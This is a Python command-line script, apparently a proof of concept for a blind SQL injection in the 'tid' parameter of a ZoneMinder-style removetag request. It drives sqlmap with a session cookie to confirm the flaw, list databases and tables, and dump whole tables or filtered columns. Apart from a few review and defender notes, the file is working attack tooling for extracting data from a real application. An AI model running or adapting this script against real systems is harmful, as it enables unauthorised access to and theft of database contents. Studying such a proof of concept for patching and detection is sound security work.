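#!/usr/bin/env python3
"""Thin command-line wrapper that drives sqlmap against one fixed request.

The script builds a sqlmap command line for the ``tid`` parameter of the
``removetag`` request under ``/zm/index.php``. It runs sqlmap as a child
process and echoes only the output lines that look like findings,
headers or result tables. It sends no requests itself, because all
traffic comes from sqlmap.

NOTE(review): the CVE identifier printed by ``banner()`` is reproduced
from the original script; confirm it against the vendor advisory before
citing it. The ``/zm/`` path and ``ZMSESSID`` cookie suggest ZoneMinder,
which is an inference to confirm and is not stated in this file.
"""
import argparse
import subprocess
import sys

# Substrings that mark a line of sqlmap's injection-point report.
_FINDING_MARKERS = ("Parameter:", "Type:", "Payload:")

# Lower-case substrings that mark section headers worth echoing.
_HEADER_MARKERS = (
    "available databases",
    "database:",
    "tables",
    "table:",
    "dumping",
)


def banner():
    """Print the one-line banner shown at start-up."""
    print("\n[+] CVE-2024-51428 Blind SQLi PoC (sqlmap wrapper)\n")


def run_sqlmap(cmd):
    """Run *cmd* and echo a filtered view of its combined output.

    Args:
        cmd: Argument vector to execute. It is passed to ``Popen`` as a
            list without a shell, so values from the command line are
            never interpreted by a shell.

    Returns:
        True if any output line contained one of ``_FINDING_MARKERS``.
        This is a text heuristic over sqlmap's output, not a parsed
        verdict, and sqlmap's exit status is not consulted.
    """
    try:
        process = subprocess.Popen(
            cmd,
            stdout=subprocess.PIPE,
            stderr=subprocess.STDOUT,
            text=True,
            bufsize=1,
        )
    except FileNotFoundError:
        # Without this the user only sees a traceback from Popen.
        sys.exit("[-] sqlmap no está instalado o no está en el PATH")

    vulnerable = False
    # The context manager closes the pipe and reaps the child even if
    # the loop is interrupted.
    with process:
        for raw_line in process.stdout:
            line_clean = raw_line.strip()
            if not line_clean:
                continue

            # Injection-point report: remember it and show it.
            if any(marker in line_clean for marker in _FINDING_MARKERS):
                vulnerable = True
                print(line_clean)
                continue

            # Section headers (case-insensitive match).
            lowered = line_clean.lower()
            if any(marker in lowered for marker in _HEADER_MARKERS):
                print(line_clean)
                continue

            # Items sqlmap lists with a "[*] " bullet; drop the bullet.
            if line_clean.startswith("[*]"):
                print(line_clean.replace("[*] ", ""))
                continue

            # ASCII table rows and borders.
            if "|" in line_clean or "+" in line_clean:
                print(line_clean)

    return vulnerable


def build_base(url, cookie):
    """Return the sqlmap argument list shared by every mode.

    Args:
        url: Base URL of the target; the request path is appended as-is.
        cookie: Value of the ``ZMSESSID`` session cookie.

    Returns:
        A list starting with ``"sqlmap"`` that fixes the tested
        parameter (``tid``), the DBMS, batch mode, the thread count and
        the technique flag.

    The session cookie becomes a command-line argument of both this
    script and sqlmap, so other local users can read it from the process
    list, and it may also be kept in shell history. Treat the session as
    exposed after a run.

    For defenders: the request carries ``action=removetag`` with ``tid``
    as the only tested parameter. ``tid`` is presumably an integer tag
    id (confirm against the application), so non-numeric ``tid`` values
    for this action in access logs are worth alerting on.
    """
    target = f"{url}/zm/index.php?view=request&request=event&action=removetag&tid=1"
    return [
        "sqlmap",
        "-u", target,
        "--cookie", f"ZMSESSID={cookie}",
        "-p", "tid",
        "--dbms=mysql",
        "--batch",
        "--threads=10",
        "--technique=T",
    ]


def main():
    """Parse the command line and run the selected sqlmap mode.

    Modes, in the order they are checked:
      * no ``-d``/``-db``/``-t``: detection run, prints a verdict;
      * ``-d`` without ``-db``: list databases;
      * ``-d`` with ``-db`` and no ``-t``: list tables of that database;
      * ``-t``: dump the table, optionally limited by ``-f`` / ``-ff``.

    Two invalid combinations are rejected with a usage error. The first
    is ``-t`` without ``-db``, which used to put ``None`` into the
    argument vector and crash inside ``subprocess``. The second is
    ``-db`` on its own, which used to exit silently without running
    anything.
    """
    parser = argparse.ArgumentParser()
    parser.add_argument("--url", required=True, help="URL objetivo")
    parser.add_argument("-c", required=True, help="Cookie ZMSESSID")
    parser.add_argument("-d", action="store_true", help="Enumerar bases de datos")
    parser.add_argument("-db", help="Base de datos objetivo")
    parser.add_argument("-t", help="Tabla objetivo")
    parser.add_argument("-f", help="Columna a mostrar")
    parser.add_argument("-ff", nargs=2, metavar=("COLUMN", "VALUE"),
                        help="Filtro WHERE columna=valor")
    args = parser.parse_args()

    banner()
    base_cmd = build_base(args.url, args.c)

    # Detection only.
    if not args.d and not args.db and not args.t:
        print("[*] Comprobando vulnerabilidad...\n")
        if run_sqlmap(base_cmd + ["-v", "1"]):
            print("\n[+] OBJETIVO VULNERABLE A BLIND SQLi\n")
        else:
            print("\n[-] No se detectó vulnerabilidad\n")
        return

    # List databases.
    if args.d and not args.db:
        print("[*] Enumerando bases de datos...\n")
        run_sqlmap(base_cmd + ["--dbs"])
        return

    # List tables of one database.
    if args.d and args.db and not args.t:
        print(f"[*] Enumerando tablas de {args.db}\n")
        run_sqlmap(base_cmd + ["-D", args.db, "--tables"])
        return

    # Dump one table.
    if args.t:
        if not args.db:
            parser.error("-t requiere -db")

        cmd = base_cmd + ["-D", args.db, "-T", args.t]

        if args.ff:
            column, value = args.ff
            # The value is placed between single quotes without any
            # escaping, so a value that itself contains a quote yields
            # a malformed --where expression.
            cmd += [
                "-C", args.f or column,
                "--where", f"{column}='{value}'",
                "--dump",
            ]
        elif args.f:
            # Single column only.
            cmd += ["-C", args.f, "--dump"]
        else:
            # Whole table.
            cmd += ["--dump"]

        print(f"[*] Dumpeando tabla {args.t}\n")
        run_sqlmap(cmd)
        return

    # Only -db was given: no mode selected.
    parser.error("-db requiere -d (enumerar tablas) o -t (volcar tabla)")


if __name__ == "__main__":
    main()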